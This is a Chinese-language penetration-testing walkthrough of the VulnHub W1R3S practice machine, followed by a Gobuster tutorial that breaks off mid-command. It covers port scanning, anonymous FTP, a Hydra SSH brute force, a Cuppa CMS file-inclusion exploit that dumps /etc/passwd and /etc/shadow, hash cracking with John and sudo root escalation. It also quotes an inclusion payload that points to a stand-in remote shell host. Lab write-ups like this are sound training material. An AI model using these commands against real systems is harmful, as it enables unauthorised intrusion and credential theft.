靶机
DVWA
Upload-labs
Xss-labs
Pikachu
DC-1
DC-2
DC-3
DC-4
DC-5
DC-6
DC-7
DC-8
DC-9
w1r3s
JARBAS
SickOS1.1
Prime1
-
+
首页
w1r3s
下载地址:https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip > 打开靶机 下载完成之后,进行解压,然后用VMware打开即可。 1、在VMware左上方,点击【文件】--【打开】  2、选择解压缩之后的靶机文件夹,选择vmx点击打开即可。  ## 信息收集 1、确定当前kali所在的网段。 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host noprefixroute valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether 00:0c:29:f2:f7:23 brd ff:ff:ff:ff:ff:ff inet 192.168.186.128/24 brd 192.168.186.255 scope global dynamic noprefixroute eth0 valid_lft 1122sec preferred_lft 1122sec inet6 fe80::20c:29ff:fef2:f723/64 scope link noprefixroute valid_lft forever preferred_lft forever ``` 2、扫描kali所在的网段。 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap -sn 192.168.186.0/24 [sudo] password for kali: Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 02:13 EDT Nmap scan report for 192.168.186.1 (192.168.186.1) Host is up (0.00070s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.186.2 (192.168.186.2) Host is up (0.00017s latency). MAC Address: 00:50:56:EC:88:83 (VMware) Nmap scan report for localhost (192.168.186.131) Host is up (0.00040s latency). MAC Address: 00:0C:29:E6:CB:9C (VMware) Nmap scan report for 192.168.186.254 (192.168.186.254) Host is up (0.00020s latency). MAC Address: 00:50:56:EF:45:80 (VMware) Nmap scan report for 192.168.186.128 (192.168.186.128) Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 1.93 seconds ``` 确定靶机所在IP地址为192.168.186.131 3、针对目标IP地址扫描开放端口。 > 完整的TCP扫描 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap -sT --min-rate 10000 -p- 192.168.186.131 Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 02:16 EDT Nmap scan report for localhost (192.168.186.131) Host is up (0.00059s latency). Not shown: 55528 filtered tcp ports (no-response), 10003 closed tcp ports (conn-refused) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 3306/tcp open mysql MAC Address: 00:0C:29:E6:CB:9C (VMware) Nmap done: 1 IP address (1 host up) scanned in 12.40 seconds ``` > UDP 扫描 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap -sU --min-rate 10000 -p- 192.168.186.131 Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 02:16 EDT Nmap scan report for localhost (192.168.186.131) Host is up (0.00042s latency). Not shown: 65534 open|filtered udp ports (no-response) PORT STATE SERVICE 3306/udp closed mysql MAC Address: 00:0C:29:E6:CB:9C (VMware) Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds ``` 确定开放端口21、22、80、3306。 3、针对开放的端口进行版本服务探测、默认脚本扫描、操作系统探测。 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap -sT -sV -sC -O -p21,22,80,3306 192.168.186.131 [sudo] password for kali: Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 02:22 EDT Nmap scan report for localhost (192.168.186.131) Host is up (0.00037s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.0.8 or later | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.186.128 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) | drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content | drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs |_drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 07:e3:5a:5c:c8:18:65:b0:5f:6e:f7:75:c7:7e:11:e0 (RSA) | 256 03:ab:9a:ed:0c:9b:32:26:44:13:ad:b0:b0:96:c3:1e (ECDSA) |_ 256 3d:6d:d2:4b:46:e8:c9:a3:49:e0:93:56:22:2e:e3:54 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 3306/tcp open mysql MySQL (unauthorized) MAC Address: 00:0C:29:E6:CB:9C (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.14 (97%), Linux 5.1 - 5.15 (95%), Linux 3.13 - 3.16 (93%), Linux 3.13 - 4.4 (93%), Linux 3.8 - 3.16 (93%), Linux 4.10 (93%), Linux 3.4 - 3.10 (93%), Linux 3.10 (93%), Linux 4.4 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.99 seconds ``` 由以上信息得知: - 21端口:ftp可能存在匿名登录; - 22端口:ssh可能存在暴力破解; - 80端口:为Apache2安装的默认页面; - 3306端口:可能存在未授权登录。 4、针对目标IP地址的开放端口进行漏洞扫描。 ```bash nmap --script=vuln <target> ``` 会运行所有归类为"vuln"的 NSE 脚本,自动检测常见的安全漏洞。 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap --script=vuln -p21,22,80,3306 192.168.186.131 [sudo] password for kali: Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 02:23 EDT Nmap scan report for localhost (192.168.186.131) Host is up (0.00030s latency). PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-csrf: Couldn't find any CSRF vulnerabilities. | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ | http-enum: | /wordpress/: Blog |_ /wordpress/wp-login.php: Wordpress login page. 3306/tcp open mysql MAC Address: 00:0C:29:E6:CB:9C (VMware) Nmap done: 1 IP address (1 host up) scanned in 321.06 seconds ``` 由以上得知: - 80端口:还存在wordpress网站。 ## 21端口:FTP匿名登录 1、进行ftp的连接,账户名为【anonymous】,密码为任意值或为空。 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ ftp 192.168.186.131 Connected to 192.168.186.131. 220 Welcome to W1R3S.inc FTP service. Name (192.168.186.131:kali): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ``` 2、如果不知道命令可以使用【 ?】。 ```bash ftp> ? Commands may be abbreviated. Commands are: ! case dir fget idle mdelete modtime ntrans progress rcvbuf rmdir sndbuf type $ cd disconnect form image mdir more open prompt recv rstatus status umask account cdup edit ftp lcd mget mput page proxy reget runique struct unset append chmod epsv gate less mkdir mreget passive put remopts send sunique usage ascii close epsv4 get lpage mls msend pdir pwd rename sendport system user bell cr epsv6 glob lpwd mlsd newer pls quit reset set tenex verbose binary debug exit hash ls mlst nlist pmlsd quote restart site throttle xferbuf bye delete features help macdef mode nmap preserve rate rhelp size trace ? ``` 3、防止文件损坏,切换为二进制模式,命令【binary】。 ```bash ftp> binary 200 Switching to Binary mode. ftp> ``` 4、关掉提示模式,命令为【prompt】。 prompt 是 FTP 客户端的一个交互式命令,用于**切换交互提示模式**。它控制在使用 mget、mput 等批量文件传输命令时是否对每个文件进行确认提示。 ```bash ftp> prompt Interactive mode off. ``` 5、下载ftp文件到本地,【mget】批量下载,【get】单个文件下载。 ```bash ftp> ? get get receive file ftp> ? mget mget get multiple files ``` ```bash ftp> ls 229 Entering Extended Passive Mode (|||49991|) 150 Here comes the directory listing. drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees 226 Directory send OK. ftp> cd content 250 Directory successfully changed. ftp> ls 229 Entering Extended Passive Mode (|||48901|) 150 Here comes the directory listing. -rw-r--r-- 1 ftp ftp 29 Jan 23 2018 01.txt -rw-r--r-- 1 ftp ftp 165 Jan 23 2018 02.txt -rw-r--r-- 1 ftp ftp 582 Jan 23 2018 03.txt 226 Directory send OK. ftp> mget *.txt local: 01.txt remote: 01.txt 229 Entering Extended Passive Mode (|||49697|) 150 Opening BINARY mode data connection for 01.txt (29 bytes). 100% |************************************************************ ftp> cd .. 250 Directory successfully changed. ftp> cd docs 250 Directory successfully changed. ftp> get worktodo.txt local: worktodo.txt remote: worktodo.txt 229 Entering Extended Passive Mode (|||43826|) 150 Opening BINARY mode data connection for worktodo.txt (138 bytes). 100% |*********************************************************************** ...... ``` 6、退出ftp。 ```bash ftp> ? exit exit terminate ftp session and exit ftp> exit 221 Goodbye. ``` 7、在本地打开下载的所有txt文件。 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ cat *.txt New FTP Server For W1R3S.inc # # # # # # # # 01ec2d8fc11c493b25029fb1f47f39ce # # # # # # # # # # # # # SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg== ############################################ ___________.__ __ __ ______________________ _________ .__ \__ ___/| |__ ____ / \ / \/_ \______ \_____ \ / _____/ |__| ____ ____ | | | | \_/ __ \ \ \/\/ / | || _/ _(__ < \_____ \ | |/ \_/ ___\ | | | Y \ ___/ \ / | || | \/ \/ \ | | | \ \___ |____| |___| /\___ > \__/\ / |___||____|_ /______ /_______ / /\ |__|___| /\___ > \/ \/ \/ \/ \/ \/ \/ \/ \/ The W1R3S.inc employee list Naomi.W - Manager Hector.A - IT Dept Joseph.G - Web Design Albert.O - Web Design Gina.L - Inventory Rico.D - Human Resources ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡ ....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ ``` 其中有用的消息便是 ```txt employee list Naomi.W - Manager Hector.A - IT Dept Joseph.G - Web Design Albert.O - Web Design Gina.L - Inventory Rico.D - Human Resources ``` ## 22端口:SSH 一般情况下,优先级最低。 根据得到的员工,组成用户名列表: ```txt w1r3s Hector.A Gina.L Albert.O Joseph.G Naomi.W ``` 密码字典可以使用rockyou。 ```txt ──(kali㉿kali)-[/usr/share/wordlists] └─$ ls amass dirb dirbuster dnsmap.txt fasttrack.txt fern-wifi john.lst legion metasploit nmap.lst rockyou.txt.gz sqlmap.txt wfuzz wifite.txt ┌──(kali㉿kali)-[/usr/share/wordlists] └─$ sudo gunzip rockyou.txt.gz [sudo] password for kali: ┌──(kali㉿kali)-[/usr/share/wordlists] └─$ ls amass dirb dirbuster dnsmap.txt fasttrack.txt fern-wifi john.lst legion metasploit nmap.lst rockyou.txt sqlmap.txt wfuzz wifite.txt ``` 使用hydra进行暴力破解: ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ hydra -L users.list -P /usr/share/wordlists/rockyou.txt ssh://192.168.186.131 -t 5 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-01 03:41:26 [DATA] max 5 tasks per 1 server, overall 5 tasks, 86066394 login tries (l:6/p:14344399), ~17213279 tries per task [DATA] attacking ssh://192.168.186.131:22/ [22][ssh] host: 192.168.186.131 login: w1r3s password: computer ``` 爆破成功:login: w1r3s password: computer ## 80端口 1、使用浏览器访问目标IP地址。  2、访问根下的wordpress呢,发现直接进行了跳转,跳转的域名为localhost。  3、修改本地的hosts文件。 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ cat /etc/hosts 192.168.186.131 localhost 127.0.1.1 kali.localdomain kali # The following lines are desirable for IPv6 capable hosts ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters ``` 再次访问还是不行,先将访问wordpress进行放置。 4、对80端口进行目录扫描。 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sudo gobuster dir -u http://192.168.186.131 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt =============================================================== Gobuster v3.8 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.186.131 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.8 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /wordpress (Status: 301) [Size: 322] [--> http://192.168.186.131/wordpress/] /javascript (Status: 301) [Size: 323] [--> http://192.168.186.131/javascript/] /administrator (Status: 301) [Size: 326] [--> http://192.168.186.131/administrator/] ``` 访问http://192.168.186.131/wordpress/会进行跳转到本地localhost。  访问 http://192.168.186.131/javascript/,403.  访问http://192.168.186.131/administrator/,CMS安装页面。  得知该页面有极大的可能性是CuppaCMS搭建的。 5、漏洞库搜索。 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ searchsploit cuppa cms -------------------------------------------------------------------------------------------------------------------------------- Exploit Title | Path -------------------------------------------------------------------------------------------------------------------------------- Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt -------------------------------------------------------------------------------------------------------------------------------- Shellcodes: No Results ┌──(kali㉿kali)-[~/Desktop] └─$ searchsploit cuppa -------------------------------------------------------------------------------------------------------------------------------- Exploit Title | Path -------------------------------------------------------------------------------------------------------------------------------- Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt -------------------------------------------------------------------------------------------------------------------------------- Shellcodes: No Results ``` 6、下载到本地进行查看。 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ searchsploit -m 25971 Exploit: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion URL: https://www.exploit-db.com/exploits/25971 Path: /usr/share/exploitdb/exploits/php/webapps/25971.txt Codes: OSVDB-94101 Verified: True File Type: C++ source, ASCII text, with very long lines (876) Copied to: /home/kali/Desktop/25971.txt ``` 7、根据文档描述,cuppar存在文件包含漏洞,可包含远程文件也可以包含本地文件。 EXP为: ```bash http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt? http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd ``` 构造本地访问的exp: ```bash http://192.168.186.131/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd ```  成功访问,但是没有任何信息,会不会是请求方式不对呢?根据文件中提到的源码部分: ```bash /alerts/alertConfigField.php (LINE: 22) ----------------------------------------------------------------------------- LINE 22: <?php include($_REQUEST["urlConfig"]); ?> ----------------------------------------------------------------------------- ``` 源码地址:http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip。 8、解压源码, 到对应的位置进行查看。 ```bash <div id="content_alert_config" class="content_alert_config"> <?php include "../components/table_manager/fields/config/".@$cuppa->POST("urlConfig"); ?> </div> ``` POST 接收请求。 9、构造EXP: ```bash curl --data-urlencode "urlConfig=../../../../../../../../../etc/passwd" http://192.168.186.131/administrator/alerts/alertConfigField.php ``` 得到passwd文件内容: ```bash root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false whoopsie:x:109:117::/nonexistent:/bin/false avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false saned:x:119:127::/var/lib/saned:/bin/false usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false ``` 第二个字段是密码字段,显示为'x',表示用户的密码已经被影子密码(shadow password)保护。 第二个字段表示: x = 密码在 shadow 文件中 空 = 无密码(危险!) * = 账户被禁用 ! = 密码被锁定 故,访问shadow文件。 ```bash curl --data-urlencode "urlConfig=../../../../../../../../../etc/shadow" http://192.168.186.131/administrator/alerts/alertConfigField.php ``` 得到文件内容: ```bash root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7::: daemon:*:17379:0:99999:7::: bin:*:17379:0:99999:7::: sys:*:17379:0:99999:7::: sync:*:17379:0:99999:7::: games:*:17379:0:99999:7::: man:*:17379:0:99999:7::: lp:*:17379:0:99999:7::: mail:*:17379:0:99999:7::: news:*:17379:0:99999:7::: uucp:*:17379:0:99999:7::: proxy:*:17379:0:99999:7::: www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7::: backup:*:17379:0:99999:7::: list:*:17379:0:99999:7::: irc:*:17379:0:99999:7::: gnats:*:17379:0:99999:7::: nobody:*:17379:0:99999:7::: systemd-timesync:*:17379:0:99999:7::: systemd-network:*:17379:0:99999:7::: systemd-resolve:*:17379:0:99999:7::: systemd-bus-proxy:*:17379:0:99999:7::: syslog:*:17379:0:99999:7::: _apt:*:17379:0:99999:7::: messagebus:*:17379:0:99999:7::: uuidd:*:17379:0:99999:7::: lightdm:*:17379:0:99999:7::: whoopsie:*:17379:0:99999:7::: avahi-autoipd:*:17379:0:99999:7::: avahi:*:17379:0:99999:7::: dnsmasq:*:17379:0:99999:7::: colord:*:17379:0:99999:7::: speech-dispatcher:!:17379:0:99999:7::: hplip:*:17379:0:99999:7::: kernoops:*:17379:0:99999:7::: pulse:*:17379:0:99999:7::: rtkit:*:17379:0:99999:7::: saned:*:17379:0:99999:7::: usbmux:*:17379:0:99999:7::: w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7::: sshd:*:17554:0:99999:7::: ftp:*:17554:0:99999:7::: mysql:!:17554:0:99999:7::: ``` 整理密码被加密的用户: ```bash w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7::: www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7::: root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7::: ``` > 密码字段结构 格式:$id$salt$encrypted - $6 = 哈希算法标识符 - $xe/eyoTx = 盐值(salt) - $gttdIYrx... = 加密后的密码哈希 10、进行解密。 将密码被加密的用户整理形成文件,例如shadow.hash ```bash ┌──(kali㉿kali)-[~/Desktop/bc] └─$ john shadow.hash Created directory: /home/kali/.john Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256" Use the "--format=HMAC-SHA256" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 512/512 AVX512BW 8x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 6 OpenMP threads Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, almost any other key for status www-data (www-data) Almost done: Processing the remaining buffered candidate passwords, if any. Proceeding with wordlist:/usr/share/john/password.lst computer (w1r3s) Proceeding with incremental:ASCII 2g 0:00:00:54 3/3 0.03703g/s 20903p/s 20932c/s 20932C/s bbalip..bbb189 2g 0:00:15:38 3/3 0.002131g/s 21168p/s 21170c/s 21170C/s mlappo..mlp978 Use the "--show" option to display all of the cracked passwords reliably ``` 用户名:www-data,密码:www-data 用户名:w1r3s,密码:computer www-data账户一般是功能性账户。 11、使用ssh进行登录。 用户名:w1r3s,密码:computer ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ ssh w1r3s@192.168.186.131 The authenticity of host '192.168.186.131 (192.168.186.131)' can't be established. ED25519 key fingerprint is SHA256:Bue5VbUKeMSJMQdicmcMPTCv6xvD7I+20Ki8Um8gcWM. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.186.131' (ED25519) to the list of known hosts. ---------------------- Think this is the way? ---------------------- Well,........possibly. ---------------------- w1r3s@192.168.186.131's password: Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 639 packages can be updated. 486 updates are security updates. .....You made it huh?.... Last login: Tue Sep 30 21:41:49 2025 from 192.168.186.128 w1r3s@W1R3S:~$ whoami w1r3s w1r3s@W1R3S:~$ id uid=1000(w1r3s) gid=1000(w1r3s) groups=1000(w1r3s),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) w1r3s@W1R3S:~$ ``` 重点在: ```bash groups=1000(w1r3s),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) ``` | 组ID | 组名 | 权限说明 | 安全意义 | | -------- | ---------- | -------------- | ---------------------------------- | | **1000** | w1r3s | 用户的主组 | 基本文件操作权限 | | **4** | adm | 系统监控权限 | 可读取 `/var/log` 系统日志文件 | | **24** | cdrom | 光驱设备权限 | 可以挂载和使用光盘驱动器 | | **27** | **sudo** | **管理员权限** | **可执行 sudo 命令获得 root 权限** | | **30** | dip | 拨号网络权限 | 可创建 PPP/拨号连接 | | **46** | plugdev | 可移动设备权限 | 可自动挂载 USB 设备等 | | **113** | lpadmin | 打印机管理权限 | 可配置和管理打印机 | | **128** | sambashare | Samba 共享权限 | 可访问网络文件共享 | ## 3306端口:mysql ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ mysql -h 192.168.186.131 ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host '192.168.186.128' is not allowed to connect to this MySQL server ``` 拒绝我们的连接。 ## sudo提权 发现该用户拥有sudo的权限,故查看可以使用sudo执行哪些命令。 sudo -l 列出用户的权限 ```bash w1r3s@W1R3S:~$ sudo -l [sudo] password for w1r3s: Matching Defaults entries for w1r3s on W1R3S.localdomain: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User w1r3s may run the following commands on W1R3S.localdomain: (ALL : ALL) ALL ``` 发现可以使用sudo执行任意命令,故: ```bash w1r3s@W1R3S:~$ sudo /bin/bash root@W1R3S:~# whoami root root@W1R3S:~# id uid=0(root) gid=0(root) groups=0(root) root@W1R3S:~# ``` ```bash sudo /bin/bash 表示以管理员权限启动bash shell【新的 bash 进程继承 root 权限】 ``` ```bash root@W1R3S:~# cd /root/ root@W1R3S:/root# ls flag.txt root@W1R3S:/root# cat flag.txt ----------------------------------------------------------------------------------------- ____ ___ _ _ ____ ____ _ _____ _ _ _ _ _____ ___ ___ _ _ ____ / ___/ _ \| \ | |/ ___| _ \ / \|_ _| | | | | / \|_ _|_ _/ _ \| \ | / ___| | | | | | | \| | | _| |_) | / _ \ | | | | | | | / _ \ | | | | | | | \| \___ \ | |__| |_| | |\ | |_| | _ < / ___ \| | | |_| | |___ / ___ \| | | | |_| | |\ |___) | \____\___/|_| \_|\____|_| \_\/_/ \_\_| \___/|_____/_/ \_\_| |___\___/|_| \_|____/ ----------------------------------------------------------------------------------------- .-----------------TTTT_-----_______ /''''''''''(______O] ----------____ \______/]_ __...---'"""\_ --'' Q ___________@ |''' ._ _______________=---------""""""" | ..--''| l L |_l | | ..--'' . /-___j ' ' | ..--'' / , ' ' |--'' / ` \ L__' \ - - '-. '. / '-./ ---------------------------------------------------------------------------------------- YOU HAVE COMPLETED THE __ __ ______________________ _________ / \ / \/_ \______ \_____ \ / _____/ \ \/\/ / | || _/ _(__ < \_____ \ \ / | || | \/ \/ \ \__/\ / |___||____|_ /______ /_______ /.INC \/ \/ \/ \/ CHALLENGE, V 1.0 ---------------------------------------------------------------------------------------- CREATED BY SpecterWires ---------------------------------------------------------------------------------------- ``` ## Gobuster ### 概述 > 定义 Gobuster 是一款**多模式字典爆破工具**,通过向目标发送大量构造的请求,结合字典中的条目(如目录名、文件名、子域名等),根据响应结果(如状态码、长度、内容)判断目标是否存在对应的资源或记录。 > 特性 **多模式支持**:涵盖目录 / 文件爆破、子域名爆破、DNS 记录爆破、VHost(虚拟主机)爆破等多种场景。 **高性能**:基于 Go 语言的并发特性,支持高线程数(默认 10 线程,可自定义),爆破效率高于传统 Python 工具(如 DirBuster)。 **灵活过滤**:可通过状态码、响应长度、正则表达式等筛选有效结果,减少无效信息干扰。 **跨平台**:基于 Go 语言编译,可在 Linux、Windows、macOS 等系统运行(Kali 默认预装)。 **无依赖**:单文件二进制程序,无需额外安装依赖库,直接可执行。 ### 主要爆破模式 `gobuster -h ` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ gobuster -h NAME: gobuster - the tool you love USAGE: gobuster command [command options] VERSION: 3.8 AUTHORS: Christian Mehlmauer (@firefart) OJ Reeves (@TheColonial) COMMANDS: dir Uses directory/file enumeration mode vhost Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter) dns Uses DNS subdomain enumeration mode fuzz Uses fuzzing mode. Replaces the keyword FUZZ in the URL, Headers and the request body tftp Uses TFTP enumeration mode s3 Uses aws bucket enumeration mode gcs Uses gcs bucket enumeration mode help, h Shows a list of commands or help for one command GLOBAL OPTIONS: --help, -h show help --version, -v print the version ``` > 目录/文件扫描模式 (dir) ```bash # 最基本的目录扫描 gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt # 详细输出 gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -v # 指定线程数 gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -t 50 ``` ```bash # 完整参数示例 gobuster dir -u 